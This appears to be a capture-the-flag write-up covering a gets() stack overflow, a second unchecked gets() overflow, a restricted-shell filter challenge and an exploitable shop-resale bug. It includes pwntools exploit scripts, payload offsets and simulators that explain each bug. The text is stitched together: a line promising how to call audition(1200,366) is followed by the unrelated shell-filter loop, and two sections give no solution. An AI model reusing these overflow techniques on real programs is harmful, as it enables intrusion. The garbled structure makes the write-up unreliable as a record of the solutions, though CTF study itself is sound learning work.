In lockdown, the flag is printed (via flag_me) whenever local_10 is non-zero after the input has been read:

```c
void lockdown(void)
{
    char local_50 [64];
    int local_10;

    local_10 = 0;
    puts("I made this really cool flag but Governor Hogan put it on lockdown");
    puts("Can you convince him to give it to you?");
    gets(local_50);
    if (local_10 == 0) {
        puts("I am no longer asking. Give me the flag!");
    }
    else {
        flag_me();
    }
    return;
}
```
gets() performs no bounds check, so this line is an obvious stack buffer overflow:

```c
gets(local_50);
```
Stack layout: local_50[64] | local_10. Ghidra names stack slots by their hex offset below the frame base, so local_10 starts 0x50 - 0x10 = 0x40 = 64 bytes after the start of local_50. Everything after the first 64 bytes of our input is written over local_10.
Solution
Overwrite local_10 with a non-zero value through the overflow. 64 bytes fill the buffer, so a 65-byte payload puts 0x41 into the low byte of local_10 (gets() then writes its terminating NUL into the next byte):

```python
# assumes a pwntools tube and sla = p.sendlineafter
offset = 65
payload = b'A' * offset
sla(b'Can you convince him to give it to you?\n', payload)
```
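To see why 65 bytes is the minimum, here is an added example (not from the writeup) that models lockdown()'s frame byte by byte: the offsets come from Ghidra's local_50/local_10 names, and the function and constant names are my own. It derives the 64-byte distance, simulates gets() including the NUL it appends, and reads back what ends up in local_10 for a given payload.

```python
# Added example: byte-level model of lockdown()'s stack frame (not the challenge's code).
import struct

# Ghidra names stack slots by their hex offset below the frame base:
# local_50 starts 0x50 bytes below it, local_10 starts 0x10 bytes below it.
LOCAL_50 = 0x50
LOCAL_10 = 0x10
BUF_SIZE = 64


def offset_to(var_off, buf_off=LOCAL_50):
    """Distance from the start of local_50 to the start of another stack slot."""
    return buf_off - var_off


def build_payload(fill=b'A'):
    """64 bytes fill the buffer; one more byte lands in local_10's low byte."""
    return fill * (offset_to(LOCAL_10) + 1)


def simulate_gets(payload, frame_size=LOCAL_50):
    """Model gets(local_50) on a zeroed frame and return the int left in local_10.

    gets() copies everything up to the newline and appends a NUL, with no
    bounds check, so bytes beyond BUF_SIZE overwrite whatever follows the buffer.
    """
    if b'\n' in payload:
        raise ValueError("gets() stops at the first newline; payload must not contain one")
    data = payload + b'\x00'  # gets() terminates the line with NUL
    if len(data) > frame_size:
        # Beyond the modelled frame lie saved rbp / return address; not modelled here.
        raise ValueError("payload runs past local_10 into the saved frame")
    frame = bytearray(frame_size)  # all zero, matching local_10 = 0
    frame[:len(data)] = data       # the unchecked copy
    start = offset_to(LOCAL_10)
    return struct.unpack('<i', frame[start:start + 4])[0]


if __name__ == '__main__':
    print('offset to local_10:', offset_to(LOCAL_10))
    print('local_10 after 64 x A:', simulate_gets(b'A' * BUF_SIZE))
    print('local_10 after 65 x A:', simulate_gets(build_payload()))
```

With exactly 64 bytes the NUL that gets() appends is what lands in local_10, so it stays 0 and the check still fails; the 65th byte is what flips it.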
There is a buffer overflow at gets(song) in get_audition_info (gets(name) is equally unchecked):

```c
void get_audition_info()
{
    char name[50];
    char song[50];
    printf("What's your name?\n");
    gets(name);
    printf("What song will you be singing?\n");
    gets(song);
}
```
and we can print flag by calling audition(1200,366):
```bash
while [ 1 ]
do
    read -p 'nash> ' input
    echo $input | sed 's/ //g' | sed 's/{//g' | sed 's/}//g' | sed 's/IFS//g' | sed 's/(//g' | sed 's/)//g' | /bin/bash
done
```
Spaces, IFS, {, }, ( and ) are stripped from our input before it reaches /bin/bash. The usual space substitutes therefore fail: cat$IFSflag.txt becomes cat$flag.txt, and cat${IFS}flag.txt loses its braces first and ends up the same way.
```text
Timmy: Welcome! How can I help you today?
1. I want to sell
2. What's for sale?
3. See you later.
```
I want to sell
The list shown for "I want to sell":

```text
Choice: 1
Of course! What exactly are you offering?
1. flimsy axe - chop chop chop
   Price: 800 bells
2. olive flounder - it's looking at me funny
   Price: 800 bells
3. slingshot - the closest thing you can get to a gun
   Price: 900 bells
4. flimsy shovel - for digging yourself out of debt
   Price: 800 bells
```
An item disappears from the list after it is sold (note that the remaining entries keep their original numbers):

```text
3
Timmy: A slingshot! Sure! How about if I offer you 900 Bells?
Thank you! Please come again!

1. I want to sell
2. What's for sale?
3. See you later.
Choice: 1
Of course! What exactly are you offering?
1. flimsy axe - chop chop chop
   Price: 800 bells
2. olive flounder - it's looking at me funny
   Price: 800 bells
4. flimsy shovel - for digging yourself out of debt
   Price: 800 bells
```
What’s for sale?
The list shown for "What's for sale?":

```text
Timmy: Welcome! How can I help you today?
1. I want to sell
2. What's for sale?
3. See you later.
Choice: 2
8500 bells
Timmy: Here's what we have to sell today.
1. flimsy net - 400 bells
2. tarantula - 8000 bells
3. slingshot - 900 bells
4. sapling - 640 bells
5. cherry - 400 bells
6. flag - 420000 bells
```
Our balance (8500 bells) is shown after choosing 2.
We do not have enough bells to buy the flag (420000), but we can afford the tarantula (8000).
After we buy it, the tarantula is added to the "I want to sell" list:
```text
2
Timmy: Excellent purchase! Yes, thank you for the bells

1. I want to sell
2. What's for sale?
3. See you later.
Choice: 1
Of course! What exactly are you offering?
1. flimsy axe - chop chop chop
   Price: 800 bells
2. olive flounder - it's looking at me funny
   Price: 800 bells
3. slingshot - the closest thing you can get to a gun
   Price: 900 bells
4. flimsy shovel - for digging yourself out of debt
   Price: 800 bells
5. tarantula - I hate spiders!
   Price: 8000 bells
```

Now we sell the tarantula (choice 5) and look at the list again:

```text
Timmy: Excellent purchase! Yes, thank you for the bells

1. I want to sell
2. What's for sale?
3. See you later.
Choice: 1
Of course! What exactly are you offering?
1. flimsy axe - chop chop chop
   Price: 800 bells
2. olive flounder - it's looking at me funny
   Price: 800 bells
3. slingshot - the closest thing you can get to a gun
   Price: 900 bells
4. flimsy shovel - for digging yourself out of debt
   Price: 800 bells
5. tarantula - I hate spiders!
   Price: 8000 bells
5
Timmy: A tarantula! Sure! How about if I offer you 8000 Bells?
Thank you! Please come again!

1. I want to sell
2. What's for sale?
3. See you later.
Choice: 1
Of course! What exactly are you offering?
1. flimsy axe - chop chop chop
   Price: 800 bells
2. olive flounder - it's looking at me funny
   Price: 800 bells
3. slingshot - the closest thing you can get to a gun
   Price: 900 bells
4. flimsy shovel - for digging yourself out of debt
   Price: 800 bells
5. tarantula - I hate spiders!
   Price: 8000 bells
```
The tarantula is still in the "I want to sell" list after being sold! We get paid 8000 bells each time, so we can sell it repeatedly until we can afford the flag, then buy the flag. Starting from the 500 bells left after the purchase, 53 sales (500 + 53 * 8000 = 424500) are enough for the 420000-bell flag.
```python
# assumes a pwntools tube p for the challenge and sla = p.sendlineafter
# sell the tarantula 53 times - 8000*53 = 424000 bells
for i in range(53):
    sla(b'Choice: ', b'1')
    sla(b'5. tarantula - I hate spiders! Price: 8000 bells\n', b'5')
    print(i)

# sell items 1 and 2 (make room in pockets); entries keep their numbers, so
# the tarantula line is still a usable prompt afterwards
sla(b'Choice: ', b'1')
sla(b'5. tarantula - I hate spiders! Price: 8000 bells\n', b'2')
sla(b'Choice: ', b'1')
sla(b'5. tarantula - I hate spiders! Price: 8000 bells\n', b'1')

# buy the flag
sla(b'Choice: ', b'2')
sla(b'6. flag - 420000 bells\n', b'6')

# print the flag (the sell list now contains it)
context.log_level = 'debug'
sla(b'Choice: ', b'1')
```
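The following is an added example (not the challenge's code or the writeup's script) that models Timmy's shop well enough to reproduce the bug next to a corrected version and to count the sales the exploit needs. Prices and the 8500-bell starting balance are taken from the transcripts above; the pocket-size limit that forced the two extra sales is left out. The real root cause is not visible in the writeup, so the buggy sell routine here simply fails to remove items that were bought from the shop, which is an assumption chosen to match the observed behaviour. All class and function names are my own.

```python
# Added example: model of Timmy's shop with the observed "sold item stays in pockets" bug.
import math

SHOP_STOCK = {          # "What's for sale?" prices from the writeup
    'tarantula': 8000,
    'flag': 420000,
}
START_BELLS = 8500      # balance shown after the first "What's for sale?"


class Shop:
    def __init__(self, buggy):
        self.buggy = buggy
        self.bells = START_BELLS
        # (name, price, bought_from_shop); the four starting items from the writeup
        self.pockets = [('flimsy axe', 800, False), ('olive flounder', 800, False),
                        ('slingshot', 900, False), ('flimsy shovel', 800, False)]

    def buy(self, name):
        price = SHOP_STOCK[name]
        if self.bells < price:
            return False
        self.bells -= price
        self.pockets.append((name, price, True))
        return True

    def sell(self, name):
        for i, (n, price, bought) in enumerate(self.pockets):
            if n == name:
                self.bells += price
                # Assumed root cause: the buggy routine pays for the item but only
                # removes it if it was in the starting inventory. The fix is to
                # remove the sold item unconditionally.
                if not (self.buggy and bought):
                    del self.pockets[i]
                return True
        return False

    def has(self, name):
        return any(n == name for n, _, _ in self.pockets)


def sells_needed(bells, price, target):
    """How many sales at `price` are needed to reach `target` from `bells`."""
    return max(0, math.ceil((target - bells) / price))


def run_exploit(shop, max_sells=1000):
    """Buy the tarantula, resell it until the flag is affordable, then buy the flag.

    Returns the number of tarantula sales, or None if the loop stalls because the
    item actually left the pockets (the fixed shop).
    """
    if not shop.buy('tarantula'):
        return None
    sells = 0
    while shop.bells < SHOP_STOCK['flag']:
        if sells >= max_sells or not shop.sell('tarantula'):
            return None
        sells += 1
    shop.buy('flag')
    return sells


if __name__ == '__main__':
    print('sales needed:', sells_needed(START_BELLS - 8000, 8000, 420000))
    print('buggy shop:', run_exploit(Shop(buggy=True)))
    print('fixed shop:', run_exploit(Shop(buggy=False)))
```

Against the buggy shop the loop makes exactly the 53 sales the script above hard-codes; against the fixed shop the first sale removes the tarantula and the second attempt fails, so the balance ends where it started.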